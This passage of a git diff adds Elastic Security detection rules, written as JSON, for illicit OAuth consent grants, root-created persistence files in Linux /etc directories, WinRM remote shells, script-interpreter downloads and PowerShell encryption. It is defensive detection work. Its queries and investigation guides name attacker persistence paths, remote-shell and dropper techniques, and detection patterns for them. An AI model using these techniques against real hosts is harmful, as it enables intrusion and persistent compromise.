the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Disable the malicious application to stop user access and the application access to your data.\n- Revoke the application Oauth consent grant. The `Remove-AzureADOAuth2PermissionGrant` cmdlet can be used to complete this task.\n- Remove the service principal application role assignment. The `Remove-AzureADServiceAppRoleAssignment` cmdlet can be used to complete this task.\n- Revoke the refresh token for all users assigned to the application. Azure provides a [playbook](https://github.com/Azure/Azure-Sentinel/tree/master/Playbooks/Revoke-AADSignInSessions) for this task.\n- [Report](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#send-feedback) the application as malicious to Microsoft.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Investigate the potential for data compromise from the user's email and file sharing services. Activate your Data Loss incident response playbook.\n- Disable the permission for a user to set consent permission on their behalf.\n - Enable the [Admin consent request](https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow) feature.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.dataset:(azure.activitylogs or azure.auditlogs or o365.audit) and\n (\n azure.activitylogs.operation_name:\"Consent to application\" or\n azure.auditlogs.operation_name:\"Consent to application\" or\n o365.audit.Operation:\"Consent to application.\"\n ) and\n event.outcome:(Success or success)\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", + "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", + "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Operation", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1528", + "name": "Steal Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1528/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 111 + }, + "id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_113.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_113.json new file mode 100644 index 00000000000..d8364209914 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_113.json @@ -0,0 +1,171 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Creation in /etc for Persistence", + "note": "## Triage and analysis\n\n### Investigating Suspicious File Creation in /etc for Persistence\n\nThe /etc/ directory in Linux is used to store system-wide configuration files and scripts.\n\nBy creating or modifying specific system-wide configuration files, attackers can leverage system services to execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.\n\nThis rule monitors for the creation of the most common system-wide configuration files and scripts abused by attackers for persistence. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n- Investigate whether any other files in any of the commonly abused directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path LIKE '/etc/ld.so.conf.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/sudoers.d/%' OR\\n path LIKE '/etc/rc%.d/%' OR\\n path LIKE '/etc/init.d/%' OR\\n path LIKE '/etc/systemd/system/%' OR\\n path LIKE '/usr/lib/systemd/system/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path LIKE '/etc/ld.so.conf.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/sudoers.d/%' OR\\n path LIKE '/etc/rc%.d/%' OR\\n path LIKE '/etc/init.d/%' OR\\n path LIKE '/etc/systemd/system/%' OR\\n path LIKE '/usr/lib/systemd/system/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Cron Job Created or Changed by Previously Unknown Process - ff10d4d8-fea7-422d-afb1-e5a2702369a9\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"linux\" and event.type in (\"creation\", \"file_create_event\") and user.id == \"0\" and\nfile.path : (\"/etc/ld.so.conf.d/*\", \"/etc/cron.d/*\", \"/etc/sudoers.d/*\", \"/etc/rc.d/init.d/*\", \"/etc/systemd/system/*\",\n\"/usr/lib/systemd/system/*\") and not (\n (process.name : (\n \"chef-client\", \"ruby\", \"pacman\", \"packagekitd\", \"python*\", \"platform-python\", \"dpkg\", \"yum\", \"apt\", \"dnf\", \"rpm\",\n \"systemd\", \"snapd\", \"dnf-automatic\", \"yum-cron\", \"elastic-agent\", \"dnfdaemon-system\", \"dockerd\", \"executor\",\n \"rhn_check\"\n )\n ) or \n (file.extension in (\"swp\", \"swpx\", \"tmp\"))\n)\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/", + "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c84dd64-7e6c-4bad-ac73-a5014ee37042", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Orbit", + "Threat: Lightning Framework", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + }, + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 113 + }, + "id": "1c84dd64-7e6c-4bad-ac73-a5014ee37042_113", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_107.json b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_107.json new file mode 100644 index 00000000000..0de47dd8664 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_107.json @@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote execution via Windows Remote Management (WinRM) remote shell on a target host. This could be an indication of lateral movement.", + "false_positives": [ + "WinRM is a dual-use protocol that can be used for benign or malicious activity. It's important to baseline your environment to determine the amount of noise to expect from this tool." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Incoming Execution via WinRM Remote Shell", + "query": "sequence by host.id with maxspan=30s\n [network where host.os.type == \"windows\" and process.pid == 4 and network.direction : (\"incoming\", \"ingress\") and\n destination.port in (5985, 5986) and network.protocol == \"http\" and source.ip != \"127.0.0.1\" and source.ip != \"::1\"]\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"winrshost.exe\" and not process.executable : \"?:\\\\Windows\\\\System32\\\\conhost.exe\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 47, + "rule_id": "1cd01db9-be24-4bef-8e7c-e923f0ff78ab", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.006", + "name": "Windows Remote Management", + "reference": "https://attack.mitre.org/techniques/T1021/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "1cd01db9-be24-4bef-8e7c-e923f0ff78ab_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_109.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_109.json new file mode 100644 index 00000000000..be620eb964a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_109.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via Script Interpreter", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1d276579-3380-4095-ad38-e596a01bc64f", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "1d276579-3380-4095-ad38-e596a01bc64f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_6.json b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_6.json new file mode 100644 index 00000000000..23414d730df --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_6.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of Cmdlets and methods related to encryption/decryption of files in PowerShell scripts, which malware and offensive security tools can abuse to encrypt data or decrypt payloads to bypass security solutions.", + "false_positives": [ + "Legitimate PowerShell Scripts which makes use of encryption." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Encryption/Decryption Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script with Encryption/Decryption Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available for use in various environments, creating an attractive way for attackers to execute code.\n\nPowerShell offers encryption and decryption functionalities that attackers can abuse for various purposes, such as concealing payloads, C2 communications, and encrypting data as part of ransomware operations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n\n### False positive analysis\n\n- This is a dual-use mechanism, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the script doesn't contain malicious functions or potential for abuse, no other suspicious activity was identified, and there are justifications for the execution.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Cryptography.AESManaged\" or\n \"Cryptography.RijndaelManaged\" or\n \"Cryptography.SHA1Managed\" or\n \"Cryptography.SHA256Managed\" or\n \"Cryptography.SHA384Managed\" or\n \"Cryptography.SHA512Managed\" or\n \"Cryptography.SymmetricAlgorithm\" or\n \"PasswordDeriveBytes\" or\n \"Rfc2898DeriveBytes\"\n ) and\n (\n CipherMode and PaddingMode\n ) and\n (\n \".CreateEncryptor\" or\n \".CreateDecryptor\"\n )\n ) and not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1d9aeb0b-9549-46f6-a32d-05e2a001b7fd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 6 + }, + "id": "1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_6", + 